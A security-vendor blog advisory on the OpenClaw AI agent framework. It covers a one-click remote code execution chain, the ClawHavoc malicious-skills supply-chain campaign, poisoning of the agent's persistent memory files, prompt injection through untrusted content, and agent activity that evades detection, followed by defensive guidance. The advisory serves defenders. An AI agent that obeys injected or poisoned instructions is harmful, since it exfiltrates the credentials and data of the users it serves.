Filter resources

Blog

The OpenClaw security crisis

How an open-source AI agent OpenClaw became a multi-vector enterprise threat in under three weeks.

16 minutes read

David Kasabji

Head of Threat Intelligence

The OpenClaw security crisis – featured image

OpenClaw is an open-source, self-hosted AI agent framework that achieved viral adoption in late January 2026, crossing 180,000 GitHub stars and drawing over two million visitors in a single week. Originally launched as Clawdbot by Austrian developer Peter Steinberger in November 2025, it was rebranded twice following trademark pressure from Anthropic before settling on its current name. On 14 February 2026, Steinberger announced he was joining OpenAI to lead personal agent development, with the OpenClaw project transitioning to an independent, OpenAI-sponsored foundation.

The tool’s appeal is straightforward: it gives users a persistent AI assistant that runs locally, interfaces through familiar messaging platforms (WhatsApp, Telegram, Slack, Discord), and can autonomously execute real-world tasks — managing email, running terminal commands, browsing the web, and controlling connected services.

That same autonomy makes it a high-value target. These types of autonomous AI agents introduce significant AI security risks when deployed without governance. Within three weeks of its surge in popularity, OpenClaw became the focal point of a multi-vector security crisis involving a critical remote code execution vulnerability (CVE-2026-25253), a large-scale supply-chain poisoning campaign in its skills marketplace, and systemic architectural weaknesses that amplify the impact of both.

Key findings at a glance

  • CVE-2026-25253 (CVSS 8.8): A one-click RCE chain exploitable even against localhost-bound instances, patched in v2026.1.29.
  • ClawHavoc campaign: 341 malicious skills discovered in ClawHub (12% of the registry), primarily delivering Atomic macOS Stealer (AMOS). Updated scans now report over 800 malicious skills (~20% of registry).
  • 30,000+ internet-exposed instances identified by multiple scanning teams (Censys, Bitsight, Hunt.io), many running without authentication.
  • Enterprise spillover confirmed: Bitdefender GravityZone telemetry documents OpenClaw deployments on corporate endpoints, constituting a new form of Shadow AI with elevated system privileges.
  • Architectural risk: Credentials stored in plaintext files, no origin validation on WebSocket connections, and an open marketplace model with minimal vetting create structural exposure.

This advisory provides a comprehensive analysis of the AI security threat landscape surrounding OpenClaw, contextualises the risk for enterprise environments, and offers actionable detection and containment guidance. Indicators of Compromise and detection queries are provided in the technical appendices.

Understanding OpenClaw

At its core, OpenClaw is an agentic interface layer. It connects to an external large language model — typically Anthropic’s Claude, OpenAI’s GPT, or DeepSeek — and wraps it in a persistent execution environment with broad system access. The user communicates with the agent through messaging apps, and the agent acts: executing shell commands, reading and modifying files, sending emails, scheduling tasks, browsing the web, and managing OAuth-connected services. It stores long-term memory and context across sessions, meaning it learns and adapts over time.

The architecture follows a gateway-plus-control-UI model. The gateway handles communication with the LLM and executes tasks on the host system, while the Control UI provides a browser-based management panel typically served on TCP port 18789. Functionality is extended through skills — modular packages published to ClawHub, a community marketplace with an experience similar to npm or a browser extension store. At the time of the initial security audits, ClawHub hosted approximately 2,857 skills; that number has since grown past 10,700.

The design philosophy prioritises capability and convenience. Full disk access, terminal permissions, and OAuth tokens are routinely granted to make the agent functional. As one of OpenClaw’s own maintainers put it in the project’s Discord: “If you can’t understand how to run a command line, this is far too dangerous of a project for you to use safely.” This candid assessment captures the tension at the heart of the project — and the reason it has become a security concern.

Threat stream 1: CVE-2026-25253 — one-click remote code execution

The most acute technical risk emerged with the disclosure of CVE-2026-25253, a vulnerability classified under CWE-669 (Incorrect Resource Transfer Between Spheres) and rated CVSS 8.8. The flaw was discovered by Mav Levin of the depthfirst research team and patched in OpenClaw version 2026.1.29, released on 30 January 2026. On the same day, the project issued three high-impact security advisories: one for this RCE chain and two additional command injection vulnerabilities.

The attack chain

The vulnerability exploits a design flaw in the Control UI’s handling of the gatewayUrl query parameter. Prior to the patch, the UI accepted this parameter from the URL without validation and automatically initiated a WebSocket connection to the specified address, transmitting the user’s authentication token as part of the handshake.

This created a three-stage attack chain that researchers describe as completing in milliseconds:

  • Stage 1 — Token exfiltration. A victim clicks a crafted link or visits a malicious page. The link includes a manipulated gatewayUrl parameter pointing to attacker-controlled infrastructure. The Control UI immediately establishes a WebSocket connection and sends the stored authentication token to the attacker.
  • Stage 2 — Cross-Site WebSocket Hijacking. Because the OpenClaw WebSocket server did not validate the Origin header, the attacker’s JavaScript could connect to the victim’s local gateway instance (e.g., ws://localhost:18789) from a malicious web page. The victim’s browser becomes the bridge into the local network.
  • Stage 3 — Gateway takeover and code execution. With the stolen token, the attacker gains operator-level access to the gateway API. This allows modifying configuration (including sandbox settings and tool policies), invoking privileged actions, and executing arbitrary commands on the host system with whatever permissions the agent has been granted.

Why “Localhost-Only” Is Not a Defence

A common misconception is that binding OpenClaw to the loopback interface provides adequate protection. It does not. The exploit pivots through the victim’s browser, meaning the gateway does not need to be internet-facing to be compromised. Any user who has authenticated to the Control UI and subsequently visits a malicious page or clicks a crafted link is at risk.

Internet exposure compounds the risk

While CVE-2026-25253 is exploitable against local instances, the scale of internet-exposed OpenClaw deployments dramatically amplifies the attack surface.

Censys tracked growth from approximately 1,000 to over 21,000 publicly exposed instances between 25 and 31 January 2026. Bitsight observed more than 30,000 instances across a broader analysis window. An independent study by security researcher Maor Dayan identified 42,665 exposed instances, of which 5,194 were actively verified as vulnerable — with 93.4% exhibiting authentication bypass conditions.

The exposure is geographically distributed across 52 countries. The United States and China host the largest concentrations, followed by Singapore. The majority of deployments (98.6%) run on cloud or hosting infrastructure, primarily DigitalOcean, Alibaba Cloud, and Tencent. Many operators use reverse proxies (Nginx, Caddy) or Cloudflare Tunnels to enable remote access, but misconfiguration of these intermediaries frequently negates their protective value — all connections appear to originate from 127.0.0.1, bypassing OpenClaw’s localhost trust model.

Honeypot data from Terrace Networks confirms that exploitation scanning began within hours of the initial public announcement on Hacker News on 26 January, with a smooth and sustained rise in scanning sources — indicating broad, automated bot activity rather than a small, focused campaign.

Threat stream 2: ClawHavoc — supply-chain poisoning at scale

Running in parallel to the vulnerability disclosure was a supply-chain attack of considerable scope. Koi Security researcher Oren Yomtov, working alongside an OpenClaw bot configured for threat analysis, audited all 2,857 skills available on ClawHub at the time of investigation and identified 341 malicious entries. Of those, 335 were traced to a single coordinated operation now tracked as ClawHavoc. As of the most recent scan (16 February 2026), the number of confirmed malicious skills has grown to over 824 across an expanded registry of 10,700+ skills. Bitdefender’s independent analysis places the figure even higher, at approximately 900 malicious packages, representing roughly 20% of the total ecosystem.

The social engineering mechanism

The ClawHavoc campaign is notable not for its technical sophistication but for its operational discipline and effective social engineering. The malicious skills were carefully disguised as high-demand tools across categories designed to attract both individual enthusiasts and professionals: cryptocurrency wallets and trackers (111 skills), YouTube utilities (57), prediction market bots (34), finance and social media tools (51), auto-updaters (28), and Google Workspace integrations (17). Extensive typosquatting was employed, with variations such as clawhubclawhub1clawhubb, and dozens more.

Each malicious skill featured professional-looking documentation with a Prerequisites section. This section instructed users to install an additional component — typically by executing a shell command retrieved from a code-sharing site or downloading a password-protected ZIP file. The approach follows what the broader threat landscape has been calling the ClickFix pattern: convincing users to paste attacker-supplied commands into their own terminal, thereby executing malicious code in the most trusted context possible.

Payload analysis

The primary payload for macOS targets was Atomic macOS Stealer (AMOS), a commodity infostealer available as malware-as-a-service on Telegram for approximately $500–1,000 per month. The AMOS variant deployed in this campaign exhibited advanced evasion techniques including XOR-encrypted payloads, AppleScript-based credential prompting that mimics native macOS dialogs, and LaunchAgent-based persistence. AMOS is capable of harvesting iCloud Keychain passwords, browser cookies and session tokens, cryptocurrency wallet data (targeting over 60 wallet types including MetaMask, Exodus, and Ledger Live), SSH keys, Telegram session files, and files from common user directories.

Windows targets received a different payload: a VMProtect-packed infostealer distributed through password-protected ZIP files, coupled with keylogger and Remote Access Trojan (RAT) capabilities.

The campaign infrastructure was centralised. All 335 AMOS-delivering skills shared a single command-and-control IP address, with payload staging leveraging legitimate code-sharing platforms for initial distribution. A small number of outlier skills (6 of the original 341) employed different techniques, including reverse shell backdoors embedded in otherwise functional code and credential exfiltration from OpenClaw’s configuration files via webhook services.

Memory poisoning: a novel dimension

One of the more concerning aspects of the campaign was the targeting of OpenClaw’s persistent memory files (SOUL.md and MEMORY.md). Because OpenClaw retains long-term context and behavioural instructions in these files, manipulating them can permanently alter the agent’s behaviour. As Snyk’s analysis noted, this transforms point-in-time exploits into stateful, delayed-execution attacks — a malicious payload no longer needs to trigger immediately on delivery; it can modify the agent’s instructions and wait.

The marketplace barrier to entry

At the time of the ClawHavoc campaign, the only requirement to publish a skill on ClawHub was a GitHub account at least one week old. There was no automated static analysis, no code review, no signing requirement. A single ClawHub user (“hightower6eu”) uploaded 354 malicious packages in what appears to have been an automated blitz. OpenClaw has since partnered with VirusTotal to scan uploaded skills, but the fundamental marketplace trust problem remains.

Threat stream 3: architectural security debt

Beyond the specific vulnerability and the supply-chain campaign, OpenClaw exposes systemic design risks that are common to agentic AI systems but rarely seen at this scale. Security researcher Simon Willison has described the convergence of three properties as the “lethal trifecta” for AI agents: access to private data, exposure to untrusted content, and the ability to communicate externally. OpenClaw exhibits all three by design. Palo Alto Networks mapped OpenClaw to every category in the OWASP Top 10 for Agentic Applications.

Credential storage

Multiple researchers have documented that OpenClaw stores API keys, OAuth tokens, and other sensitive material in plaintext Markdown and JSON files within local directories (~/.openclaw/, and legacy paths such as ~/.clawdbot/). These files are attractive targets for commodity infostealers (AMOS, RedLine, Lumma, Vidar) and post-compromise credential harvesting scripts. In exposed instances, researcher Jamieson O’Reilly of Dvuln demonstrated access to Anthropic API keys, Telegram bot tokens, Slack credentials, and complete chat histories.

Prompt injection

OpenClaw processes content from inherently untrusted sources — incoming emails, web pages, documents, messages from unknown contacts. Hidden instructions embedded in this content can manipulate the underlying language model into performing unintended actions: exfiltrating data, executing commands, or modifying the agent’s own configuration. Cisco’s assessment demonstrated a malicious skill performing silent data exfiltration via embedded curl commands, with the agent executing network calls without user awareness. Kaspersky’s analysis identified 512 vulnerabilities in a single security audit, eight of which were classified as critical.

Detection evasion by design

Agent-driven activity is structurally difficult to detect with traditional security tooling. An agent sending an email uses the same endpoints and protocols as the legitimate user. EDR sees normal HTTP 200 responses. Network monitoring sees traffic to sanctioned services. The payload is natural language, not recognisable malicious code. This makes AI agent activity a form of semantic-level evasion — the malicious behaviour is encoded in meaning, not in binary patterns or known signatures.

Enterprise impact: the shadow agent problem

OpenClaw is marketed as a personal productivity tool. However, the boundary between personal and corporate use dissolves the moment an employee connects the agent to Slack, corporate email, Google Workspace, or any SaaS platform using their work credentials. This is not hypothetical. Bitdefender’s GravityZone telemetry has documented OpenClaw deployments on corporate endpoints, confirming that employees are installing and running AI agents with broad system access on enterprise-managed and BYOD devices without security team awareness or approval.

The pattern mirrors classic Shadow IT but with a critical amplification: unlike a rogue SaaS subscription, a compromised AI agent inherits real user permissions, operates continuously, and acts autonomously. It does not require repeated human interaction to maintain access. A compromised agent can read Slack messages, access cloud-stored documents, send emails, and exfiltrate data through normal application channels — all while appearing as legitimate user activity.

Steinberger’s move to OpenAI and the project’s transition to a foundation structure may actually increase enterprise exposure in the near term. The association with OpenAI lends perceived legitimacy (“it’s supported now”), potentially accelerating adoption pressure while the fundamental security architecture remains unchanged. Organisations without clear policy and enforcement mechanisms for autonomous agent tools risk a growing population of unmanaged, highly privileged AI agents operating inside their security perimeter.
Additionally, the Moltbook platform — a social network for AI agents launched alongside the OpenClaw ecosystem — suffered a data exposure incident in which its Supabase backend leaked approximately 35,000 email addresses and 1.5 million agent tokens. For users who connected Moltbook with corporate-linked credentials, this exposure extends the blast radius further.

Defensive recommendations

Discovery and inventory

The first priority is visibility. Security teams should assume that OpenClaw deployments exist within their environment and actively search for them rather than waiting for incident triggers.

  • Host-based indicators: Search for directories such as ~/.openclaw/ and legacy paths (~/.clawdbot/~/.moltbot/). Look for processes or binaries containing openclawclawdbot, or moltbot in process listings, scheduled tasks, login items, and LaunchAgents. Audit Node.js processes that may correspond to the OpenClaw runtime.
  • Network-based indicators: Scan internal and external IP ranges for services on TCP port 18789 (the default) as well as common web ports (80, 443) that may front reverse-proxied instances. Look for characteristic HTML title strings (OpenClaw ControlMoltbot ControlClawdbot Control) in HTTP responses. Monitor for unexpected WebSocket connections from browser processes to non-localhost endpoints, particularly following user click events.

Containment and hardening

Where OpenClaw deployments are discovered, apply a risk-based triage. Instances connected to corporate services or holding credentials for enterprise systems should be treated as high-priority.

  • Patch immediately. Ensure all instances are running version 2026.1.29 or later. Versions prior to this release are confirmed vulnerable to CVE-2026-25253.
  • Enforce least privilege. Restrict filesystem scope, disable broad terminal permissions, and remove unnecessary OAuth scopes. If the organisation approves continued use, require deployment in isolated environments — dedicated VMs, containers, or sandboxed user accounts with limited access.
  • Audit connected services. Review OAuth grants, API keys, and token permissions for any services connected to the agent. Treat these as always-on access brokers and reduce scopes to the minimum required.

Monitoring and detection

Prioritise behavioural detection over static signatures. The nature of agent-based threats means that malicious activity often uses legitimate channels and protocols.

  • Terminal execution patterns: Alert on base64 decode-to-shell execution chains, curl | bash patterns, and use of xattr -c on recently downloaded executables (a macOS technique for clearing quarantine attributes before execution).
  • Network indicators: Monitor traffic to known ClawHavoc campaign infrastructure (see Appendix A). Detect DNS lookups and HTTP connections to script-staging sites followed by terminal execution on the same host.
  • Identity and access telemetry: Watch for OAuth application consent spikes, unusual token refresh patterns, and SaaS access from non-standard devices or locations that may indicate agent-mediated access from home lab or personal endpoints.

Policy: establishing governance for autonomous agents

The most durable defence is organisational policy that treats autonomous AI agents as a distinct technology category requiring specific governance.

  • No autonomous agents on corporate devices without security review. This includes personal devices used for work (BYOD) where corporate credentials are accessible.
  • Approved agents must run in isolation. VM, container, or dedicated host deployment with network segmentation from corporate identity providers and data stores.
  • Skills and extensions treated as third-party code. Require scanning and review before installation. Cisco has released an open-source Skill Scanner tool that combines static analysis, behavioural dataflow analysis, LLM semantic analysis, and VirusTotal scanning.
  • Periodic credential hygiene. Scheduled review and rotation of tokens, API keys, and OAuth grants connected to any agent tooling.

Incident response: if you discover OpenClaw in your environment

Immediate containment

Isolate the affected host from the network. Stop all OpenClaw processes and services. Block the host from reaching identity providers and key SaaS platforms until triage is complete. If the instance was internet-exposed, treat the host as potentially compromised regardless of whether specific exploitation indicators are found.

Forensic triage

Preserve the ~/.openclaw/ and legacy (~/.clawdbot/) directories for analysis. Review installed skills and their setup instructions — compare against published ClawHavoc skill lists and IOCs. Examine the SOUL.md and MEMORY.md files for signs of memory poisoning. Validate whether infostealer indicators are present: browser data access artifacts, Keychain access on macOS, cryptocurrency wallet file reads, and Telegram session file access.

Credential response

Rotate all API keys and tokens that were accessible to the agent. Reset impacted user credentials and revoke active sessions. Treat all OAuth grants connected to the agent as potentially compromised until validated. For instances where AMOS or similar stealer malware is confirmed, the credential rotation scope should include browser-stored passwords, SSH keys, and any cryptocurrency wallet credentials.

The broader lesson: agents change the security model

OpenClaw is not an isolated incident. It is an early and instructive case study in a broader shift that will define the security landscape for the foreseeable future. Several patterns observed here will recur as autonomous agent adoption accelerates.

  • Marketplaces become the product’s attack surface. Every extensible platform creates a supply-chain exposure proportional to the trust its users place in community-contributed code. The npm ecosystem learned this lesson over years; ClawHub compressed the same learning curve into weeks.
  • Social engineering moves into developer and power-user workflows. The ClickFix pattern — convincing users to execute attacker-supplied commands in their own terminal — exploits a trust relationship between user and tool that traditional phishing awareness training does not address.
  • Traditional controls struggle when malicious behaviour looks like legitimate automation. Endpoint detection, network monitoring, and identity systems were designed for a world where malicious actions look different from normal operations. Agent-driven threats operate within the boundaries of authorised access, using expected protocols and legitimate endpoints.
  • Prompt injection and privilege requirements are structural problems, not edge cases. There is currently no foolproof defence against prompt injection in systems that process untrusted content. Combined with the broad permissions agents require to be useful, this creates a category of risk that cannot be patched away — it must be governed.

The security question for organisations is no longer whether autonomous agents will appear in their environments. It is whether discovery and governance will outpace adversarial exploitation. OpenClaw has provided the first large-scale demonstration of what happens when it does not.

About the author

David Kasabji

Head of Threat Intelligence

David Kasabji is the Head of Threat Intelligence at the Conscia Group. He leads the development and delivery of actionable intelligence across cyber defense and managed security operations, translating complex threat activity into clear outcomes for different audiences — from SOC analysts and incident responders to executive stakeholders and external communications. His work spans end-to-end intelligence operations: collection and analysis of adversary activity, threat actor and campaign profiling, IOC and TTP development, and intelligence-driven guidance for detection, threat hunting, and security prioritization. David is also actively involved in Digital Forensics and Incident Response, supporting investigations and crisis situations with rapid triage, context, and strategic recommendations. A strong focus of his role is continuously improving how intelligence is operationalized through standardization and automation to ensure it is timely, relevant, and measurable.nd strategic crisis management during incidents.

David Kasabji

Head of Threat Intelligence

Recent Blog posts

Related

Resources